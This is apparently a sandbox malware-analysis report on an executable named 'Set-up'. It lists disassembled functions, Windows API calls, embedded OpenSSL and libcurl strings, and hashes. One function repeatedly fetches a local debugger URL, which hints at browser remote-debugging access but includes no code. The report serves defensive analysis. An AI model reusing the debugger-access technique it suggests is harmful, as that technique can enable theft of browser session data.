X9.42 DH PARAMETERS, xrefs: 009F85F2
NEW CERTIFICATE REQUEST, xrefs: 009F8644
PRIVATE KEY, xrefs: 009F8756, 009F8787
PKCS7, xrefs: 009F86B4, 009F86DC, 009F870C
Expecting: , xrefs: 009F8908
CMS, xrefs: 009F86F6, 009F8724
ENCRYPTED PRIVATE KEY, xrefs: 009F8740
PARAMETERS, xrefs: 009F85DC, 009F87FB
PKCS #7 SIGNED DATA, xrefs: 009F86CA
CERTIFICATE, xrefs: 009F862E, 009F866C
ANY PRIVATE KEY, xrefs: 009F85C6
TRUSTED CERTIFICATE, xrefs: 009F8680, 009F869A
CERTIFICATE REQUEST, xrefs: 009F8656
X509 CERTIFICATE, xrefs: 009F861A
DH PARAMETERS, xrefs: 009F8604
crypto/pem/pem_lib.c, xrefs: 009F84F6, 009F8509, 009F851F, 009F8545, 009F855A, 009F8572, 009F88CE, 009F8935, 009F8948, 009F895F, 009F8977, 009F898C, 009F89A5, 009F89CB

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strcmp$free
String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$Expecting: $NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS$crypto/pem/pem_lib.c
API String ID: 3401341699-4246700284
Opcode ID: 51bd56718f01a5864f0104c212d27844262c125440def80ca30bf37da4a099ba
Instruction ID: ffde2cdae4f30bdfcd28e0afb27d6146ffa0178c04959d1ad2a6d7e781d23646
Opcode Fuzzy Hash: 51bd56718f01a5864f0104c212d27844262c125440def80ca30bf37da4a099ba
Instruction Fuzzy Hash: 84B12DB1B843056BD65036206C07FBB369C5FA179AF084428FE58A12D3FFA6D619D363

Function 00872010 Relevance: 51.2, APIs: 11, Strings: 18, Instructions: 414stringnetworkCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0087204A
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00872068
WSAGetLastError.WS2_32 ref: 008720DE
recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 0087214D
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00872365
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 0087238F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 008723B9
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 0087241D
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 008724AD

Strings

got option=(%s) value=(%s), xrefs: 008723E8
TFTP error: %s, xrefs: 0087228B
tsize parsed from OACK, xrefs: 008724D3
tsize, xrefs: 0087248D
%s (%d), xrefs: 0087254A
Malformed ACK packet, rejecting, xrefs: 00872514
blksize is smaller than min supported, xrefs: 00872545
%s (%d) %s (%d), xrefs: 00872337
Internal error: Unexpected packet, xrefs: 008722C4
blksize parsed from OACK, xrefs: 00872332
blksize is larger than max supported, xrefs: 0087253C
requested, xrefs: 0087232C
Received too short packet, xrefs: 00872169
server requested blksize larger than allocated, xrefs: 00872552
%s (%ld), xrefs: 008724D8, 00872557
blksize, xrefs: 008723FC
invalid blocksize value in OACK packet, xrefs: 0087251F
invalid tsize -:%s:- value in OACK packet, xrefs: 00872573

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _time64memchrstrtol$ErrorLastrecvfromstrlen
String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP error: %s$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
API String ID: 3302935713-3407012168
Opcode ID: ab385f1f07bb14d552df36f649ded1ba905e728dfa1ca4dac95f09b3a16ecb3f
Instruction ID: b168e8e1834d13fbf3b787134213f289af257e906bf4f3941bebbf5647a643e1
Opcode Fuzzy Hash: ab385f1f07bb14d552df36f649ded1ba905e728dfa1ca4dac95f09b3a16ecb3f
Instruction Fuzzy Hash: FDE1DDB1A04305ABD710AB28DC42B6AB7E4FF94714F088528F84DD72AAE774ED44C792

Function 008AA140 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 341COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 008AA29A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000000F,?,?), ref: 008AA2C5
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 008AA2E3

Part of subcall function 008AA5A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 008AA5FC

Strings

n > 0, xrefs: 008AA53C, 008AA57B
i > 0, xrefs: 008AA4E8, 008AA590
i < blk->n - 1, xrefs: 008AA4FD
rblk->n <= NGHTTP3_KSL_MAX_NBLK - n, xrefs: 008AA512
node->blk->n == NGHTTP3_KSL_MIN_NBLK, xrefs: 008AA4D3
lblk->n >= NGHTTP3_KSL_MIN_NBLK + n, xrefs: 008AA527
rblk->n >= NGHTTP3_KSL_MIN_NBLK + n, xrefs: 008AA551
lblk->n <= NGHTTP3_KSL_MAX_NBLK - n, xrefs: 008AA566
nghttp3_ksl.c, xrefs: 008AA4CE, 008AA4E3, 008AA4F8, 008AA50D, 008AA522, 008AA537, 008AA54C, 008AA561, 008AA576, 008AA58B

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpy$memmove
String ID: i < blk->n - 1$i > 0$lblk->n <= NGHTTP3_KSL_MAX_NBLK - n$lblk->n >= NGHTTP3_KSL_MIN_NBLK + n$n > 0$nghttp3_ksl.c$node->blk->n == NGHTTP3_KSL_MIN_NBLK$rblk->n <= NGHTTP3_KSL_MAX_NBLK - n$rblk->n >= NGHTTP3_KSL_MIN_NBLK + n
API String ID: 1283327689-1606465060
Opcode ID: d8419d6743ee9e30f1e4b83f02513ba8ec7cdbc662a4e59c645fcdd931bd5ec4
Instruction ID: 070064dcb521d57d86e4bce2b7d157c70a6cb9f8b85c5c5d94375123d9bb3a4a
Opcode Fuzzy Hash: d8419d6743ee9e30f1e4b83f02513ba8ec7cdbc662a4e59c645fcdd931bd5ec4
Instruction Fuzzy Hash: F0C127316043059FDB18DF08CC859A9B7A5FF89314F54852DF84A9BAD2D770ED84CB92

Function 008727E0 Relevance: 35.4, APIs: 4, Strings: 16, Instructions: 406stringnetworkCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00872AD7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00872B3D
sendto.WS2_32(?,?,?,00000000,?,00000007), ref: 00872D30
WSAGetLastError.WS2_32 ref: 00872D3A

Strings

tftp_send_first: internal error, xrefs: 0087295C
TFTP finished, xrefs: 0087289C
Connected for transmit, xrefs: 008729E0, 00872A34
TFTP buffer too small for options, xrefs: 00872C60
tsize, xrefs: 00872BAD
TFTP filename too long, xrefs: 00872AF5
octet, xrefs: 0087280B
tftp.c, xrefs: 00872B03, 00872C6E, 00872D62
Connected for receive, xrefs: 0087290B, 0087298A
0, xrefs: 00872B94
%s%c%s%c, xrefs: 00872B2A
blksize, xrefs: 00872C33
netascii, xrefs: 00872810, 00872B23
%lld, xrefs: 00872B82
timeout, xrefs: 00872CD3
Internal state machine error, xrefs: 008728C5

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen$ErrorLastsendto
String ID: %lld$%s%c%s%c$0$Connected for receive$Connected for transmit$Internal state machine error$TFTP buffer too small for options$TFTP filename too long$TFTP finished$blksize$netascii$octet$tftp.c$tftp_send_first: internal error$timeout$tsize
API String ID: 3285375004-3063461439
Opcode ID: faf52c8879608e7cae9f5b3f57b881d54d5562c7ee201ddfd544fed8306bd323
Instruction ID: cda06c72ae9e9be1eb59ec32f890e71aaf00c4234c2ea12fc1c671d926be9376
Opcode Fuzzy Hash: faf52c8879608e7cae9f5b3f57b881d54d5562c7ee201ddfd544fed8306bd323
Instruction Fuzzy Hash: C9E1D7B1A04305ABD714AB18DC46F66B794FB55708F088568FD0CDB396EB72E8148793

Function 00824720 Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 426stringCOMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000040,?), ref: 00824749
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005D), ref: 008248E5
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 0082491B
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00824963
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00824971
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0082497B

Part of subcall function 008206F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00825663,?), ref: 008206F9

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00824A41
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00824A63
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00824A6D
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00824AE0
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00824AEA
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00824B28
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00824B34
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00824B76
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00824B80

Strings

%ld, xrefs: 008249BC
%u.%u.%u.%u, xrefs: 00824C00
urlapi.c, xrefs: 008247B9, 008247CC, 008247E2, 0082482C, 00824856, 00824879, 008249A6

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _errno$strtoul$strchr$memchrstrlen
String ID: %ld$%u.%u.%u.%u$urlapi.c
API String ID: 102816355-2423153182
Opcode ID: 7fae309444937eee491bddb193786f686a32974b545071b9ef0269265e6d9dca
Instruction ID: 1ec4cfa5efd8a5f6dbf137cec1545751c24ad63bff641c6b036647eef468bf2c
Opcode Fuzzy Hash: 7fae309444937eee491bddb193786f686a32974b545071b9ef0269265e6d9dca
Instruction Fuzzy Hash: 86D125B1904265AFE710AA28EC42B7F3BD4FF51314F054438F88ADB292F7749D9487A2

Function 0087C350 Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 166stringnetworkCOMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unknown,00000100), ref: 0087C37A
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,Unknown error), ref: 0087C476
WSAGetLastError.WS2_32 ref: 0087C4AE

Strings

No error, xrefs: 0087C463
SSL_ERROR unknown, xrefs: 0087C502, 0087C524
own , xrefs: 0087C570
QUIC connect: %s in connection to %s:%d (%s), xrefs: 0087C525
unknown, xrefs: 0087C374
Unknown error, xrefs: 0087C468, 0087C474
SSL certificate verification failed, xrefs: 0087C582
SSL certificate problem: %s, xrefs: 0087C420
Unkn, xrefs: 0087C578
erro, xrefs: 0087C568
r, xrefs: 0087C561
QUIC connection has been shut down, xrefs: 0087C3D1
SSL_ERROR_SYSCALL, xrefs: 0087C4F5

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: ErrorLastmemcpystrcpy
String ID: No error$QUIC connect: %s in connection to %s:%d (%s)$QUIC connection has been shut down$SSL certificate problem: %s$SSL certificate verification failed$SSL_ERROR unknown$SSL_ERROR_SYSCALL$Unkn$Unknown error$erro$own $r$unknown
API String ID: 31095072-3036451936
Opcode ID: 818f1013dec4959f80ebbacc902a87827676fa796bb193f0f0fe5eef7c6fe9f7
Instruction ID: 1f42e1f7ea3101cf975addf64d768306d4282d4abd4228bfab95a9fc152c6104
Opcode Fuzzy Hash: 818f1013dec4959f80ebbacc902a87827676fa796bb193f0f0fe5eef7c6fe9f7
Instruction Fuzzy Hash: E85135B19083485BD710AB559C41BBEBBD4FFD1308F04882DF98DDB242E676E9848B93

Function 00A8E990 Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 242COMMON

Download Yara Rule

APIs

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A8EA90
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 00A8EAD9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A8EB98

Strings

Calling OPENSSL_DIR_read("%s"), xrefs: 00A8EBD8
file_open_dir, xrefs: 00A8EBC0, 00A8EC6C
file_open_stream, xrefs: 00A8EC9B
localhost/, xrefs: 00A8E9FD
file:, xrefs: 00A8E9B2
file_open, xrefs: 00A8EA2D, 00A8EB07, 00A8EBFF
calling stat(%s), xrefs: 00A8EB25
Given path=%s, xrefs: 00A8EC17
providers/implementations/storemgmt/file_store.c, xrefs: 00A8EA37, 00A8EB11, 00A8EBCA, 00A8EC09, 00A8EC76, 00A8ECA5

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _errno_stat64tolower
String ID: Calling OPENSSL_DIR_read("%s")$Given path=%s$calling stat(%s)$file:$file_open$file_open_dir$file_open_stream$localhost/$providers/implementations/storemgmt/file_store.c
API String ID: 3401003986-2019258128
Opcode ID: f61de024b8dd1aa40cc8676703b806716dce30117364aaa645c9f024733dbbed
Instruction ID: 23408f2f3046cb3cbc456bc57e3a1dbcb9249631f99d32ba9d31c40f32a265f4
Opcode Fuzzy Hash: f61de024b8dd1aa40cc8676703b806716dce30117364aaa645c9f024733dbbed
Instruction Fuzzy Hash: 4371F775E44300FADB20FFE0ED47B6ABB94AF81B64F044924F945662C3F6A5E51483A3

Function 008625D0 Relevance: 19.8, APIs: 1, Strings: 12, Instructions: 295COMMON

Download Yara Rule

Strings

SASL, xrefs: 00862892
TTLS, xrefs: 00862846
L-IR, xrefs: 0086289C
LOGINDISABLED, xrefs: 00862867
STAR, xrefs: 0086283C
STARTTLS, xrefs: 00862D47
Got unexpected imap-server response, xrefs: 00863034
CAPABILITY, xrefs: 00862797
AUTH, xrefs: 008628C5
STARTTLS denied, xrefs: 00863068
STARTTLS not available., xrefs: 00863094
PREAUTH connection, already authenticated, xrefs: 00862770

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID: AUTH$CAPABILITY$Got unexpected imap-server response$L-IR$LOGINDISABLED$PREAUTH connection, already authenticated$SASL$STAR$STARTTLS$STARTTLS denied$STARTTLS not available.$TTLS
API String ID: 0-3171374047
Opcode ID: 51f07286d22aea725a26e2a9e767c44eeceac4134696d60c38c10c4c8a49deab
Instruction ID: 96a3474c0d87949c16b9571ce78666b5bf3f35db265a432558c5388bddb48918
Opcode Fuzzy Hash: 51f07286d22aea725a26e2a9e767c44eeceac4134696d60c38c10c4c8a49deab
Instruction Fuzzy Hash: 23B19C71A04B05DBDB219B24C881BBA77A4FF51708F1A01B9F849C7243DB369E88D783

Function 008020AD Relevance: 19.6, APIs: 3, Strings: 10, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008020D4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008022D0

Strings

@, xrefs: 008021F2
http://localhost:%d/json, xrefs: 00802170
+N, xrefs: 008021B1
d, xrefs: 00802178
All %d attempts to fetch debugger URL failed., xrefs: 008022EF
Failed to allocate memory for response., xrefs: 008020F1
Attempt %d failed: %s, xrefs: 0080229F
GET request succeeded on attempt %d., xrefs: 0080225D
Q, xrefs: 00802213
Failed to initialize curl., xrefs: 0080213F

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: freemalloc
String ID: +N$@$All %d attempts to fetch debugger URL failed.$Attempt %d failed: %s$Failed to allocate memory for response.$Failed to initialize curl.$GET request succeeded on attempt %d.$Q$d$http://localhost:%d/json
API String ID: 3061335427-1249806554
Opcode ID: 1ce59ad5a70fe936e586f756f57350bc1303f93dff7d679451e90349ab9fbc13
Instruction ID: be1116eeed602fff245f5f376193f53a8459e5a0f4cc937b5640779482b83f92
Opcode Fuzzy Hash: 1ce59ad5a70fe936e586f756f57350bc1303f93dff7d679451e90349ab9fbc13
Instruction Fuzzy Hash: AB6184B49043099FDB40EFA8D88979EBBF4FF44314F018819E584EB391D77999848B92

Function 008A4920 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 162COMMON

Download Yara Rule

APIs

